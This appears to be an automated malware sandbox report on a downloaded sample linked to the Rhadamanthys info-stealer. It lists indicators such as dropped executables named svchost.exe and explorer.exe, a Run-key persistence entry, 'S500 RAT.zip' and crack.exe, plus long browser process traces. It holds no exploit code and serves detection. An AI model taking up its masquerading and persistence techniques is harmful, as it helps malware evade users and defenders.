Analysis
-
max time kernel
128s -
max time network
132s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
04-04-2024 15:47
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://file.io/k3MVzAZvKJCU
Resource
win11-20240221-en
General
-
Target
https://file.io/k3MVzAZvKJCU
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 1616 created 2204 1616 svchost.exe sihost.exe -
Executes dropped EXE 5 IoCs
Processes:
svchost.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exepid process 1616 svchost.exe 6604 explorer.exe 5244 explorer.exe 5712 explorer.exe 5604 explorer.exe -
Loads dropped DLL 14 IoCs
Processes:
explorer.exeexplorer.exepid process 5244 explorer.exe 5244 explorer.exe 5244 explorer.exe 5244 explorer.exe 5244 explorer.exe 5244 explorer.exe 5604 explorer.exe 5604 explorer.exe 5604 explorer.exe 5604 explorer.exe 5604 explorer.exe 5604 explorer.exe 5604 explorer.exe 5604 explorer.exe -
Processes:
resource yara_rule behavioral1/memory/5244-485-0x00007FFD50E30000-0x00007FFD51296000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI66042\python310.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI66042\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI66042\select.pyd upx behavioral1/memory/5244-501-0x00007FFD51A20000-0x00007FFD51A44000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI66042\libcrypto-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI66042\libffi-7.dll upx behavioral1/memory/5420-504-0x0000000004E80000-0x0000000004E90000-memory.dmp upx behavioral1/memory/3836-505-0x0000000005300000-0x0000000005310000-memory.dmp upx behavioral1/memory/5244-506-0x00007FFD63E70000-0x00007FFD63E88000-memory.dmp upx behavioral1/memory/5244-507-0x00007FFD50E00000-0x00007FFD50E2C000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI66042\_ctypes.pyd upx behavioral1/memory/5244-508-0x00007FFD68B40000-0x00007FFD68B4F000-memory.dmp upx behavioral1/memory/5244-529-0x00007FFD50E30000-0x00007FFD51296000-memory.dmp upx behavioral1/memory/5604-569-0x00007FFD5BF70000-0x00007FFD5C3D6000-memory.dmp upx behavioral1/memory/5604-570-0x00007FFD6AC90000-0x00007FFD6ACB4000-memory.dmp upx behavioral1/memory/5604-571-0x00007FFD6EF00000-0x00007FFD6EF0F000-memory.dmp upx behavioral1/memory/5604-576-0x00007FFD68B40000-0x00007FFD68B4D000-memory.dmp upx behavioral1/memory/5604-579-0x00007FFD6AC70000-0x00007FFD6AC88000-memory.dmp upx behavioral1/memory/5604-573-0x00007FFD681D0000-0x00007FFD681E9000-memory.dmp upx behavioral1/memory/5604-572-0x00007FFD6AC40000-0x00007FFD6AC6C000-memory.dmp upx behavioral1/memory/5420-599-0x0000000004E80000-0x0000000004E90000-memory.dmp upx behavioral1/memory/5604-618-0x00007FFD5BF70000-0x00007FFD5C3D6000-memory.dmp upx behavioral1/memory/5604-619-0x00007FFD6AC90000-0x00007FFD6ACB4000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4181651180-3163410697-3990547336-1000\Software\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\explorer.exe" explorer.exe -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\explorer.exe pyinstaller -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4880 taskkill.exe -
NTFS ADS 1 IoCs
Processes:
msedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\S500 RAT.zip:Zone.Identifier msedge.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes:
msedge.exemsedge.exemsedge.exeidentity_helper.exemsedge.exepowershell.exepowershell.exesvchost.exedialer.exemsedge.exepid process 2268 msedge.exe 2268 msedge.exe 4072 msedge.exe 4072 msedge.exe 5752 msedge.exe 5752 msedge.exe 6064 identity_helper.exe 6064 identity_helper.exe 404 msedge.exe 404 msedge.exe 5420 powershell.exe 5420 powershell.exe 3836 powershell.exe 3836 powershell.exe 5420 powershell.exe 3836 powershell.exe 1616 svchost.exe 1616 svchost.exe 6924 dialer.exe 6924 dialer.exe 6924 dialer.exe 6924 dialer.exe 5388 msedge.exe 5388 msedge.exe 5388 msedge.exe 5388 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 45 IoCs
Processes:
msedge.exepid process 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exetaskkill.exedescription pid process Token: SeDebugPrivilege 5420 powershell.exe Token: SeDebugPrivilege 3836 powershell.exe Token: SeDebugPrivilege 4880 taskkill.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exepid process 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
Processes:
msedge.exepid process 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe 4072 msedge.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
crack.exesvchost.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exepid process 6904 crack.exe 1616 svchost.exe 6604 explorer.exe 5244 explorer.exe 5712 explorer.exe 5604 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 4072 wrote to memory of 4284 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4284 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 4384 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 2268 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 2268 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 1680 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 1680 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 1680 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 1680 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 1680 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 1680 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 1680 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 1680 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 1680 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 1680 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 1680 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 1680 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 1680 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 1680 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 1680 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 1680 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 1680 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 1680 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 1680 4072 msedge.exe msedge.exe PID 4072 wrote to memory of 1680 4072 msedge.exe msedge.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2204
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:6924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://file.io/k3MVzAZvKJCU1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd657e3cb8,0x7ffd657e3cc8,0x7ffd657e3cd82⤵PID:4284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1964 /prefetch:22⤵PID:4384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2572 /prefetch:82⤵PID:1680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:12⤵PID:3000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:12⤵PID:4740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:12⤵PID:4184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4468 /prefetch:12⤵PID:4416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:12⤵PID:1460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2084 /prefetch:12⤵PID:1792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:12⤵PID:1720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:12⤵PID:4640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:12⤵PID:576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6724 /prefetch:12⤵PID:3908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6928 /prefetch:12⤵PID:2008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7028 /prefetch:12⤵PID:1772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:12⤵PID:2992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7264 /prefetch:12⤵PID:4812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7416 /prefetch:12⤵PID:1468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6316 /prefetch:82⤵PID:4920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:12⤵PID:1108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8040 /prefetch:12⤵PID:2704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:12⤵PID:1096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7828 /prefetch:12⤵PID:3832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:12⤵PID:3952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8384 /prefetch:12⤵PID:5036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8404 /prefetch:12⤵PID:2536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8412 /prefetch:12⤵PID:2112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8420 /prefetch:12⤵PID:4492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8428 /prefetch:12⤵PID:2744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8436 /prefetch:12⤵PID:4760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10212 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10344 /prefetch:12⤵PID:6056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9976 /prefetch:12⤵PID:2544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7876 /prefetch:12⤵PID:6028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9708 /prefetch:12⤵PID:6080
-
-
